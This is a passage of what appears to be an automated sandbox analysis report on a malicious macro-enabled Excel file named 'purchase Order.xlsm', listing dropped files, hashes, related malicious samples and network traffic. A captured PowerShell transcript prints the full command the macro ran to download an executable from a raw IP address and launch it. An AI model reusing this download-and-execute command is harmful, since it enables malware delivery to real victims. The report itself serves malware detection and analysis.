                                                                                                                                                  • Quality average: 72.9%
                                                                                                                                                  • Quality standard deviation: 32.9%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 87%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsm
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.88.177, 52.109.76.34, 52.109.12.22, 20.82.210.154, 8.248.91.254, 8.248.117.254, 8.248.101.254, 67.27.142.126, 8.248.141.254, 20.54.110.249, 40.112.88.60, 52.251.79.25, 80.67.82.242, 80.67.82.235
                                                                                                                                                  • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, prod-w.nexus.live.com.akadns.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, config.officeapps.live.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  18:19:29API Interceptor38x Sleep call for process: powershell.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  No context

                                                                                                                                                  Domains

                                                                                                                                                  No context

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  RAPMSB-ASRUsetup_installer.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62
                                                                                                                                                  jGK42jrs2j.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62
                                                                                                                                                  DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62
                                                                                                                                                  p3IJWYfJZw.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62
                                                                                                                                                  SecuriteInfo.com.Variant.Razy.976213.13679.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.164
                                                                                                                                                  6FD5C640F4C1E434978FDC59A8EC191134B7155217C84.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62
                                                                                                                                                  INQUIRY 567876.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.149
                                                                                                                                                  setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62
                                                                                                                                                  hAUSJxuc9n.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.159
                                                                                                                                                  0OeX2BsbUo.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62
                                                                                                                                                  AB948F038175411DC326A1AAD83DF48D6B65632501551.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62
                                                                                                                                                  FC2E04D392AB5E508FDF6C90CE456BFD0AF6DEF1F10A2.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62
                                                                                                                                                  365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62
                                                                                                                                                  C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62
                                                                                                                                                  setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62
                                                                                                                                                  Fri051e1e7444.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62
                                                                                                                                                  wA5D1yZuTf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62
                                                                                                                                                  setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62
                                                                                                                                                  SecuriteInfo.com.Suspicious.Win32.Save.a.21156.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.164
                                                                                                                                                  setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                                                  • 212.192.241.62

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll2jFfKOEefN.exeGet hashmaliciousBrowse

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\Public\eVJOpc.exe
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):267524
                                                                                                                                                    Entropy (8bit):7.926792918769308
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:hBlL/caNwUfNSYn6ZYbjBzDHYgXdjb3reiJXrrGp7cic:neaWysgzbLRq06p7cic
                                                                                                                                                    MD5:0EDC34831B45EDED59BD2AEEF85AA41B
                                                                                                                                                    SHA1:0C925FC8A0E257584E0BF7F55E9404C1AB9BA9C5
                                                                                                                                                    SHA-256:2F939DE8B3D6388C270C1670C95A17BC0F17D0DF4EFADEABCD5D82411C3483FA
                                                                                                                                                    SHA-512:AEE07D0BF66C6B58A4E9892951B67076CB07B64E2028B53A9819F53ED8AE87EECCCA3744C2AB74476209C0177A26BE11DE42032E447D4C5AC029180998043F0A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t..........................h#...........................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\88AF1BA5-4E6A-4278-A045-D7218995DD99
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):139130
                                                                                                                                                    Entropy (8bit):5.358454037752611
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:HcQIfgxrBdA3gBwfnQ9DQW+zBY34Fi7nXboOidXVE6LWmE9:VWQ9DQW+zzXaH
                                                                                                                                                    MD5:451384E8141B1AAE595FE40EFF25AF3B
                                                                                                                                                    SHA1:AFED56695A26279FD49E6CEE4F7CF7A59D09796F
                                                                                                                                                    SHA-256:92B70E672D7EA22329DB556DC10B067961612862EC9F7CCFCB30708D09A7ABB9
                                                                                                                                                    SHA-512:04A932915375608FDEE5B8BD1EBEE58F18E09A744F8F56AD3203C080EA55181FAA97E6F69F28B5850A99ABC1F5BB5FF80AA6E64046041A26567A63405FFB7B6E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-10-27T16:19:08">.. Build: 16.0.14618.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\294DE970.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 1064 x 513, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):139201
                                                                                                                                                    Entropy (8bit):7.98388222737656
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:sWeriTte82+uLBcTvJxsQW6I6Aft9RBwcbKYWyFA6yO:sWUMdF+Bcli6I37RBwcblAa
                                                                                                                                                    MD5:1007F58193E382DA00B74BD59C5AD1AD
                                                                                                                                                    SHA1:CBC27D302892B57019FCBD076ACEC67541B7C5A1
                                                                                                                                                    SHA-256:E5AFDB4BF82680681770132A53E16ED3341311D05BEB718AC0239B0D08B97218
                                                                                                                                                    SHA-512:65339D06D22255D2C6E42A0EF1B64EECD99509FD54A7E9EDBB899C1AEC0722DDAEB41462888387F95ED3135EC542900F3944793E2D658D9F1FEA8CA0345CEC28
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: .PNG........IHDR...(............8....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs..........o.d....tIME.....'........IDATx...w...u..?U=.X..A$..H.$.,.LQ9[.. [...u......}..%[...E.").$f...."g.9.b.t...4.3...@.!....]9........A@@.B.Z.........a.o>.....,.K...}.!.>.e......r.1!.Q.......F..t.P.0.6a......c..J./..D.D........J..BG..w.1........([CD.Z..uy..1...y`..@)...: .....B...nc1&./...J........I\K.AP"(.....q,5...F...t.F.A!@.*D..H.}7.qe.@;..G..........D.....!4.....a.LoO.n........A........VB..(..J)JJE..B}}}.0....R..T.]G.|.L'.+R....JW.c...a.b.Z.....r.7y.K.b.v.....(..b.,....w:(N....z{..W...>.m7.kK..|....?..`.1U...._u.?._...H....J.h;...../9...>..H.....`L..0....A..n.{.j.v. .v..[o..@W.......k...(."..1&.S..~....;....#.|./..w=....../._c..."2n.0..R*J...v.Sn...{.~.l.m"qC&...v<...U.Ra.{*ey......0F......V)..;=n....r....P..A...+...#_k....m.R.)5F..Y..y...A"BhL}...'E.D5...1dBc.[?...[G..G<......O0..u..$....'....].N....../.A.x.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):18084
                                                                                                                                                    Entropy (8bit):5.576639096938355
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:Ut9Sr8q0JKgvYMiu+SBKne2julBLPIj779Yr90poyADYGy:8vY74Ke2ClV/+rpR
                                                                                                                                                    MD5:D80CF88941ACDB9070836B9E59562B47
                                                                                                                                                    SHA1:40833F137F4FA521B6D3194535D6CF7D402CAACB
                                                                                                                                                    SHA-256:770CEE562A6586C15DEB83393BC4A1489D7BFDA0B6BED136ED1C51C3EDAE8BA5
                                                                                                                                                    SHA-512:55C3AA8DE3609E44263D1E87C1379C7F4F986F3FBDD6DADDE3382BAF832693FD19EC243C94D4A1AFDB501324CF60DE0DDF13F746A887808CD6076A4BE3CBDD2A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: @...e.....................3..........................@..........H...............<@.^.L."My...:J..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].2.....%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_medz4hkj.nue.psm1
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1
                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: 1
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0sohs1d.apj.ps1
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1
                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: 1
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\furesfhqs8032
                                                                                                                                                    Process:C:\Users\Public\eVJOpc.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):215509
                                                                                                                                                    Entropy (8bit):7.994064433992795
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:6144:LVg0zHWsVK/is8YuAEFrO1OmoYvv/I/iM6go0Gz:LVPHW0QutO1OmoYnkWgoD
                                                                                                                                                    MD5:99ED4663E61A60F161132D3B4F336BEC
                                                                                                                                                    SHA1:2D0C5DEF3417EF814F153F452D1D50A505AC72BD
                                                                                                                                                    SHA-256:19201F29ECFDF26C38E07687AA7DC637CF15D308AC3669C363B4CBEA8743ECA9
                                                                                                                                                    SHA-512:90830CF95675492D454754325E50EB24C4D26AEE0F5807DB8FD273B381A481269D02596B24AF18B28D01E302ECA881DE3D2BC803131DB45373491340D7EA2019
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: ./....:..P......w.PX.L.`..!.v.4~...M......[`..._.-Y25....NL.'Mn+.......I.mU.0.u7.9.....&....p...le........C...;..x...g>.~<...8{6.kN..jL..Q}.F.2...;M4.Y./.Y....... .\.s.el..0E..._...{2/.....a..C..".U....c..5.@...C......4y'...W.roU......r..^......^.:...iZx..#...X.}....._..4~..M.......[D..._.-Y25.....NL...Y...J.....P..L..].6..._..sd..x....n...w8..$]......g>.~<.h.......&..3{R..4Q.......0..SWp..$..9u~+Tb.....~3.(..79..7.+/;.g..a..C..h"..A....5.@...C..=2...4y....W.ro9..8..rH.^..K...^.:....Zx..#...Xz}F...O_..4~...M......[`..._.-Y25.....NL...Y...J.....P..L..].6..._..sd..x....n...w8..$]......g>.~<.h.......&..3{R..4Q.......0..SWp..$..9u~+Tb....l..0E......7.+/;...a..C..h"..A....5.@...C..=2...4y....W.ro9..8..rH.^..K...^.:....Zx..#...Xz}F...O_..4~...M......[`..._.-Y25.....NL...Y...J.....P..L..].6..._..sd..x....n...w8..$]......g>.~<.h.......&..3{R..4Q.......0..SWp..$..9u~+Tb....l..0E......7.+/;...a..C..h"..A....5.@...C..=2...4
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll
                                                                                                                                                    Process:C:\Users\Public\eVJOpc.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):41984
                                                                                                                                                    Entropy (8bit):6.3618659378850175
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:aOmBlKo/1fu+eHaZ7UTwSvOZ7LJV82SPVnKLtYcVRVo0WwAdFrOgSHgUN5lAUTtU:aBUS1m+QaZ0wyOZ7LJV82AVstYcbVT0T
                                                                                                                                                    MD5:2D7B5C9092A04DAE0BCCB1CDDC194B0B
                                                                                                                                                    SHA1:22745EC0D8C4C3F0BE58B24CA46AD87EE42C3B4C
                                                                                                                                                    SHA-256:C5D3FB8CC4B1BE9B9AABEEB14B7F4C12F3FCE5C8DFB0C1968C82D8B5C19B9245
                                                                                                                                                    SHA-512:A5F12E040E52924D80CF8A195F7ED9A69D732632C140B23D02203DBF19D61CAD2803042E909265EC5029CC81D2A65938CFB343985A37A85430E46363D45DED7B
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                    • Filename: 2jFfKOEefN.exe, Detection: malicious, Browse
                                                                                                                                                    Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q.xa...........!.....t...,......Q..................................................................................................................................................................................\............................text....s.......t.................. ..`.rdata..X............x..............@..@.data...............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\Desktop\47E20000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):150311
                                                                                                                                                    Entropy (8bit):7.959939894048855
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:ekWeriTte82+uLBcTvJxsQW6I6Aft9RBwcbKYWyFA6yC:bWUMdF+Bcli6I37RBwcblA+
                                                                                                                                                    MD5:590CBCAC7B119FB6CBDCEA132B1286AC
                                                                                                                                                    SHA1:3120B4825BB4DCF664123959AC4CD4EF371AE561
                                                                                                                                                    SHA-256:6419C770D98BA5789CFB33D4BA10B0FAD01C7FF18546E863C4C86F836584CC68
                                                                                                                                                    SHA-512:7E6C8814B07B59C984084CB5AABFB8F23D19C10513CC665D88385FB0951BEEB349B1E76E6246D56502280F37196FA3D92AF79AB3B1F516328906CE76BD936E92
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: PK..........!................[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................TIO.0..#.."_Q....=5..r.$x?`...Uo..h.....,j.*.$..-3...........[q.D.^.m.....o.sQQ......X"......q..*F{jE.s.+%...P."z>... .2.d.5.....T.g...CL.W8.g....o..D?....^.j.q._..VDBK_ ..5.2.&_...^{j....D:a.;...gO...;Nf2..{H...;..+_C.?.0o.....j\(..u..q.R...d....7.;...=.d.:=D..= S.:T.s].a:5.uP......t..l.....P......BO3 Hyi....C.]..)w.P?......>r....^.....y..D.t.L.S...#........#.a..7...6...?..XF.F.E[..t........PK..........!..U0#....L.
                                                                                                                                                    C:\Users\user\Desktop\47E20000:Zone.Identifier
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:modified
                                                                                                                                                    Size (bytes):26
                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                    C:\Users\user\Desktop\purchase Order.xlsm (copy)
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):150311
                                                                                                                                                    Entropy (8bit):7.959939894048855
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:ekWeriTte82+uLBcTvJxsQW6I6Aft9RBwcbKYWyFA6yC:bWUMdF+Bcli6I37RBwcblA+
                                                                                                                                                    MD5:590CBCAC7B119FB6CBDCEA132B1286AC
                                                                                                                                                    SHA1:3120B4825BB4DCF664123959AC4CD4EF371AE561
                                                                                                                                                    SHA-256:6419C770D98BA5789CFB33D4BA10B0FAD01C7FF18546E863C4C86F836584CC68
                                                                                                                                                    SHA-512:7E6C8814B07B59C984084CB5AABFB8F23D19C10513CC665D88385FB0951BEEB349B1E76E6246D56502280F37196FA3D92AF79AB3B1F516328906CE76BD936E92
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview: PK..........!................[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................TIO.0..#.."_Q....=5..r.$x?`...Uo..h.....,j.*.$..-3...........[q.D.^.m.....o.sQQ......X"......q..*F{jE.s.+%...P."z>... .2.d.5.....T.g...CL.W8.g....o..D?....^.j.q._..VDBK_ ..5.2.&_...^{j....D:a.;...gO...;Nf2..{H...;..+_C.?.0o.....j\(..u..q.R...d....7.;...=.d.:=D..= S.:T.s].a:5.uP......t..l.....P......BO3 Hyi....C.]..)w.P?......>r....^.....y..D.t.L.S...#........#.a..7...6...?..XF.F.E[..t........PK..........!..U0#....L.
                                                                                                                                                    C:\Users\user\Desktop\~$purchase Order.xlsm
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):165
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    C:\Users\user\Documents\20211027\PowerShell_transcript.061544.RzyXj49c.20211027181911.txt
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1312
                                                                                                                                                    Entropy (8bit):5.311478166774335
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:BxSAx1xvBn6x2DOXUWXQUS8YZ/WNHjeTKKjX4CIym1ZJXZRQUS8YZQDnxSAZNH:BZxHvh6oO3QUSzZeNqDYB1ZjRQUSzZKh
                                                                                                                                                    MD5:60EDD266F84904DF0B7E3662BB1EC068
                                                                                                                                                    SHA1:4943F079A8ED5A53737DBD00222CE005C1398EA6
                                                                                                                                                    SHA-256:668112E350B2B164CD138A766DC2C69568C4FE16AC8A3B723E4231833621860C
                                                                                                                                                    SHA-512:E4DE5AF50CAE7CD93827923E47A641A224DE76FA9BE3DEC3478864866A3BDF7B28515611C8CF94E92B2A2333950E6C7E39B99AFFE44829F90F732323BD2AA333
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20211027181923..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 061544 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe..Process ID: 6124..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211027181923..**********************..PS>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri h

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.959887971852356
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                                                                    • ZIP compressed archive (8000/1) 8.08%
                                                                                                                                                    File name:purchase Order.xlsm
                                                                                                                                                    File size:150286
                                                                                                                                                    MD5:d1ad5761044b2abb12b78700f1a3a537
                                                                                                                                                    SHA1:7fed2064ae3681227f674608df64ff1d7c45a2ee
                                                                                                                                                    SHA256:8024e6dc8c230782b570a234318ba7b5a72f64ad5a1a3ff81584e080d9338eba
                                                                                                                                                    SHA512:0c6ec74a014e337ce2153e682ed5bbc3c059e5d3b6b2ec90e6ab3c74eeccff055c4c776020441471d6184721b87f5391fe4566cb6e9c7a0f3548816abc57d0ee
                                                                                                                                                    SSDEEP:3072:rEaWeriTte82+uLBcTvJxsQW6I6Aft9RBwcbKYWyFA6y7:rLWUMdF+Bcli6I37RBwcblAP
                                                                                                                                                    File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74ecd0e2f696908c

                                                                                                                                                    Network Behavior

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Oct 27, 2021 18:19:34.210490942 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.259701967 CEST8049746212.192.241.75192.168.2.3
